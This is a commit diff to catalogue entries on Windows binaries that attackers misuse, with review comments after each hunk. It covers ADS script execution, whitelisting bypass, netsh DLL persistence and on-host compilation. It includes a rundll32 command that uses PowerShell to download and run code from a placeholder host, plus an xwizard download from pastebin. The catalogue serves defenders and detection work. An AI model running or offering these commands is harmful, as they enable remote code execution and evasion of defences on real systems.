Fixing various issues identified

This commit is contained in:
Wietze
2021-12-14 16:50:22 +00:00
parent adf171d089
commit 6793a7d238
17 changed files with 30 additions and 32 deletions

@@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
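Review bot: the Description context line still carries the typo "exectute" ("Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream"); since this commit is a fix-up pass over these entries, correct it to "execute" here. The switch to `cscript //e:vbscript` pins the script engine explicitly, but neither the Description nor the Usecase says that the switch is required when the script lives in a stream; one clause on that would tell detection authors to key on the `//e:` switch as well as the `:` in the path.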

@@ -19,8 +19,7 @@ Commands:
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
- Path: C:\Windows\hh.exe
Code_Sample:
- Code:
Detection:
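Review bot: one of the three hh.exe paths (`C:\Windows\System32\hh.exe`, `C:\Windows\SysWOW64\hh.exe`, `C:\Windows\hh.exe`) is dropped, but this rendering has lost the +/- markers and the commit message ("Fixing various issues identified") does not say which one or why; a one-line rationale (e.g. verified absent on a default install) belongs in the message, because the Full_Path list is what defenders feed into path and hash allow-lists. Minor: `Windows vista` in the OperatingSystem line should be `Windows Vista`, as the netsh entry in this same commit already spells it.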

@@ -8,7 +8,7 @@ Commands:
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
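Review bot: the Privileges line flips between User and Admin, but nothing in the record explains which step of preparing or installing the INF file needs elevation, so the new value cannot be checked against the Description; add a short clause stating the reason. The context Description also has a grammar slip ("from a command in entered into a specially prepared INF file"), which should read "from a command entered into a specially prepared INF file".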

@@ -8,7 +8,7 @@ Commands:
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
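Review bot: the Privileges line flips between User and Admin while the Description still reads as if any user could register the helper DLL; since the Usecase is persistence that fires on every netsh invocation, i.e. a machine-wide registration, stating in the Description that registering the helper requires administrative rights keeps the two fields consistent and points defenders at the machine-wide location they should monitor. Note that this entry spells `Windows Vista` correctly; the other entries in this commit use `Windows vista` and should be aligned with it.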

@@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
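Review bot: the "Playloads" to "payloads" fix is correct, but the next context line has "defensive counter measures" while the cscript entry in this same commit uses "defensive countermeasures"; settle on one spelling. Also confirm that "payloads" matches the actual directory name and case in the repository, since a mismatch sends readers to a path that does not exist.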

@@ -19,8 +19,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe
- Path: C:\Windows\regedit.exe
Code_Sample:
- Code:
Detection:
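Review bot: as with the hh.exe hunk, one of the three regedit.exe paths is removed but the rendering no longer shows which, and the commit message gives no reason; record which path was dropped and why so that anyone maintaining allow-lists from this file can verify it. Same casing nit: `Windows vista` should be `Windows Vista`.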

@@ -8,19 +8,19 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection:
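Review bot: both commands switch between Local Admin and User, yet neither Description changes to say why the lower privilege suffices for loading the DLL and calling RegisterClass; without that, the new value is unverifiable. The two records are word-for-word identical except for Category (Execute vs AWL bypass), so either merge them into one record carrying both categories or give the second a Usecase that distinguishes it. In the Full_Path block, `c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe` and its Framework64 twin use a lowercase drive letter unlike the two paths above them, and the `v*` wildcard should be flagged as a glob, because tools that ingest these paths for allow-listing may treat them literally.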

@@ -18,7 +18,7 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
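Review bot: the added `)` closes the `.Run(` call, so the command line is now balanced (each of the three quoted strings opens and closes). The Description, "a JavaScript script that runs a PowerShell script", could name the mechanism the command actually shows, rundll32 invoking mshtml's RunHTMLApplication through a `javascript:` argument, since that is the part a detection rule keys on rather than the PowerShell stage. `http://ip:port/` is clearly a placeholder, but saying so in the Description avoids readers copying it as-is.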

@@ -5,19 +5,19 @@ Author: Lior Adar
Created: 2020-02-27
Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Description of the second command
Usecase: A description of the usecase
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
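Review bot: the template placeholders ("Description of the second command", "A description of the usecase") are gone, but both commands now carry the identical Description and Usecase, so the second record says nothing about what `-reference:Microsoft.VisualBasic.dll` adds over the first; a clause on that would justify listing it separately. The Full_Path block lists only Framework64 paths, whereas the regsvcs entry in this same commit lists both `Framework` and `Framework64`; if the 32-bit `C:\Windows\Microsoft.NET\Framework\...\vbc.exe` binaries exist on the listed OS versions they should be added, otherwise rules built from this file will miss them. Minor: "counter measures" vs "countermeasures", as noted for the odbcconf entry.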

@@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: wscript c:\ads\file.txt:script.vbs
- Command: wscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: ADS
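Review bot: this is the same `//e:vbscript` change as the cscript entry, but the two Descriptions still differ in wording ("Execute script stored in an alternate data stream", without a terminal period, versus the longer cscript sentence) although they document the same technique; align them, and in both say that the engine switch is required for a stream path so that detection authors know to match on `//e:` as well as the stream separator.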

@@ -19,7 +19,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Usecase: Download file from Internet
Category: Download
Privileges: User
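Review bot: the expanded Description is useful forensic detail (it tells a responder where the downloaded file lands), but both cache paths mix separators: `INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>` uses `/` before `<FILENAME>` while the rest of the path uses `\`; use backslashes throughout. Consider keeping the Description to one sentence and placing the cache-location detail in the Detection section, where the DFIR audience for it will look.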